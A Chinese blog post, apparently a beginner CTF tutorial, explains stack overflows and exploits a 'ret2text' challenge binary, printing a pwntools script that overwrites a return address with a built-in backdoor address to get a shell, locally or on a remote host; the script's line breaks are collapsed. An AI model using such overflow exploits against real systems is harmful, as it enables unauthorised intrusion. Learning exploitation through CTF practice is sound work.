二进制学习(pwn)-带后门的栈溢出

最新推荐文章于 2024-06-14 23:40:09 发布
最新推荐文章于 2024-06-14 23:40:09 发布
阅读量890 收藏 5
点赞数 2
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liulanghouzi/article/details/126982911
版权

随着当今网络安全水平的发展,人员技术水平的不断提高,CTF比赛变得越来越卷了。以前打比赛还能靠着杂项和密码学恰点烂分,不至于0分垫底脸面无光。现在,出题大佬已经不同意我们这些菜鸡混分等死了,不会几道PWN很可能连签到分都不让吃。唉,没办法,为了能继续在圈里混下去,只能硬着头皮一步一步的开始搞了。

    二进制漏洞,也就是我们所说的PWN,是基于程序存在的堆栈溢出造成的远程命令执行漏洞。程序中有两种存储数据的结构,他们分别是栈和堆。当我们输入的数据可以超过栈堆本身设定的长度时,就会造成溢出覆盖到具有可执行权限的返回地址或者下一个堆块,从而触发命令执行。因此,二进制漏洞可以分为栈溢出和堆溢出。栈溢出相对比较简单,但是现在签到题已经到堆溢出的水平了o(╥﹏╥)o。不慌,我们一步一步来说吧,看完这几篇内容,遇到了简单的栈溢出题,还是可以搞定滴。

    首先介绍一下要想搞PWN需要安装哪些工具。pwntool是必不可少的,使用它可以编写并向目标端口发送payload。LibcSearcher可以认为是一个包含了不同版本libc的数据库,使用它你可以根据程序泄露的数据确定libc的版本。ROPgadget提取二进制程序存在的rop链,onegadget可以提取二进制程序中可getshell的程序段。然后就是pwngdb,是一款调试二进制程序的工具,可以查看程序的运行状态和内存信息。

    接下来我们介绍一下栈溢出的分类。栈溢出包括带后门的栈溢出、可执行shellcode的栈溢出、二次栈溢出、栈迁移、格式化字符串、基于syscall的栈溢出以及基于静态编译的栈溢出等。需要注意的是32位系统和64位系统是不一样的,需要分开处理。

   下面我们拿一个带后门的栈溢出做例子来说明栈溢出大概是怎么回事,然后分类搞定栈溢出的几种基本类型。

    

    这是一个输入函数,可以输入的最大字节数为0x200,然后我们查看函数的缓存区大小(buf)发现,该函数的缓存区大小为0x80+8。

    

    这里顺便介绍以下栈结构,栈是操作系统为存储临时变量而自动开辟的一块内存区域。栈在开辟时,会将下一条指令的地址(即返回地址 r)压栈,然后再讲栈底指针压栈(即图中的 s)。

    很显然,这里是存在缓存区溢出的。当我们输入的字节数超过0x88时,多余的字节就会覆盖返回地址。当程序完成read()操作,就会跳到返回地址处执行命令。如果我们覆盖返回地址为可获得系统执行权限的函数,那就可以在程序跳转时直接getshell啦。值得庆幸的是,良心的出题者很照顾我们初学者的感受,在程序中内置了后门,如下图所示。

    接下来,就可以利用pwntool编写脚本getshell了。脚本如下:

#!/usr/bin/python#coding=utf-8from pwn import *from LibcSearcher import *
local_file  = 'level0'#choose right lib according to the elflocal_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'#local_libc  = '/lib/i386-linux-gnu/libc-2.23.so'remote_libc = local_libcis_local = Falseis_remote = False
if len(sys.argv) == 1:    is_local = True    p = process(local_file)    libc = ELF(local_libc)elif len(sys.argv) > 1:    is_remote = True    if len(sys.argv) == 3:        host = sys.argv[1]        port = sys.argv[2]    else:        host, port = sys.argv[1].split(':')    p = remote(host, port)    libc = ELF(remote_libc)
elf = ELF(local_file)context.log_level = 'debug'context.arch = elf.arch# change the payload according to the gadgetsback_door=0x400596offset =0x88payload = 'A'*offsetpayload += p64(back_door)
p.recvuntil('Hello, World\n')p.sendline(payload)p.interactive()

    这个脚本中第3行和第4行是分别引用了pwntool和libcsearcher包,14行至26行,是根据传递参数确定脚本类型。如果是本地调试,则直接python exp.py。如果是远程调试,则python exp.py ip:port。28至30行可以理解为固定配置。33行至40行是我们的核心代码,实现的功能是向程序传入0x88个A后,再返回地址处跳转到后门函数。然后利用pwntool内置的recvuntil()函数接收信息,利用sendline发送payload。

后续学习分享、题目链接可移步公众号 “断剑重铸

羊刀赵信就是猛
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
PWN-栈溢出漏洞
qq_42526420的博客
02-27 294
PWN-栈溢出漏洞 ret2text 信息搜集阶段 checksec re2text弄清楚保护机制 checksec的使用 file ret2text 静态分析 Q:IDA作为静态分析工具怎么可以计算出get_shell的虚拟地址? ​ 大概是因为这个文件没有开启ALSR技术,因此仅仅凭ELF文件本身信息尽可以推断出加载到内存的情况! vullnerable函数中的局部变量buf数组在IDA中给出了其在栈帧中的位置[ebp-10h],这个建议 有时准有时不准,保险起见这里要经过动态
CTF--pwn栈溢出漏洞
q759451733的博客
05-27 4553
0x00 工具介绍 * Ubuntu系统(kali也可以) * gdb-peda 这个是神器,二进制分析必备神器 0x01 程序源码 #include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char * argv[]) { char buf[4...
pwn的常用脚本
最新发布
biu801的博客
06-14 495
他是pwndbg的一个工具, 用来计算栈的大小。把输出的东西在gdb中输入进去,得到报错的地址。然后输入: cyclic -l -0x2349。调用gets来构造bin/sh。我么输入: cyclic 200。
PWN入门之栈溢出
weixin_44681716的博客
03-12 1207
PWN入门 先利用IDA对pwn文件进行静态调试 对pwn文件进行反编译 因为CFT是夺旗赛,所以我们首先要找到get flag的函数 利用gdb进行动态调试 我们就可以利用栈溢出获取系统权限 利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得栈长。 我们利用cyclic length函数产生若干个有序字符。 利用cyclic 300产生300个有序字符。 用gdb来运...
pwn入门(1)二进制基础
农夫果园好好喝的博客
06-27 1178
破解、利用成功(程序的二进制漏洞)攻破(设备、服务器)控制(设备、服务器)exploit:用于攻击的脚本与方案payload:攻击载荷,是的目标进程被劫持控制流的数据shellcode:调用攻击目标的shell代码从C源代码到可执行文件的生成过程什么是可执行文件? 局部变量全部存放在栈中。...
PWN之路】二进制基础
weixin_38835814的博客
08-28 1274
CTF越来越火,没想到我们单位也组织战队参赛,可惜的是PWN学习路径过于陡峭,短期又看不到成绩,此位空缺。想到大学时跟着台湾ROCK老师搞过一阵逆向,兴趣也有,决定从头复习一遍,谁叫我们大学那会没有CTF这种东西呢。以下内容为本人的学习笔记,边学边记录,不对的地方欢迎大家指正。提示:本内容仅供技术交流,不可用于违法用途。......
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
简单的PWN栈溢出的尝试
weixin_48421613的博客
06-20 465
这是一道2018年的PWN的简单试题
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3393
PWN 二进制漏洞审计
重邮二进制群-pwn1
weixin_30347335的博客
10-04 78
给学弟们练手的题目,做的过程中接触一些基本概念 #include <stdio.h> #include <unistd.h> int main() { char name[40]; welcome(); printf("enter your name\n"); read(STDIN...
栈溢出学习(一)之利用预留后门 & return2shellcode
Pz_mstr's Blog
03-20 1256
前言 栈溢出学习(一),针对一个例子,进行各种栈溢出技术的练习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * gcc -O0 -fno-stack-protector -no-pie ...
PWN · ret2text | RISC-V异构】[2023 羊城杯]login
Mr_Fmnwon的博客
09-03 720
我们context.arch经常是'i386'和'amd64',突然遇到RISC-V架构的题目,一是本地运行不了(环境没配),二是IDA无法反汇编。苦恼。一、食用工具于是找啊找。找到cutter——一款risc-v的反汇编反编译工具,然而太shi了,反编译的c代码看不了一点,全是错的。GhidraGhidra 是美国国家安全局(RSA)开源发布的软件逆向工程框架,涵盖了反汇编、反编译等工具。该工具2019年3月开源。与之对标的有windows平台下的IDA Pro和linux平台下的radare2等。
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 335
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
Ba1_Ma0的博客
09-08 1265
有什么不会或者是错误的地方的可以私信我,看到必回。
CTF比赛 二进制 PWN方向入门:基础知识点精讲
qq_62564422的博客
02-05 1727
称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态。这些参数仍会保存在调用函数(caller)的函数状态内,之后压入栈内的数据都会作为被调用函数(callee)的函数状态来保存。再将当前的ebp 寄存器的值(也就是调用函数的基地址)压入栈内,并将 ebp 寄存器的值更新为当前栈顶的地址。p2 1:59:00 开始。
NJUPT PWN入门:理解栈溢出原理与利用方法
栈溢出是计算机安全领域中一个重要的概念,尤其是在逆向工程(Pwn)中扮演着关键角色...同时,对于学习Pwn或逆向工程的人来说,掌握栈溢出的利用方法是入门阶段的重要挑战,也是进一步深入研究其他漏洞利用技术的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值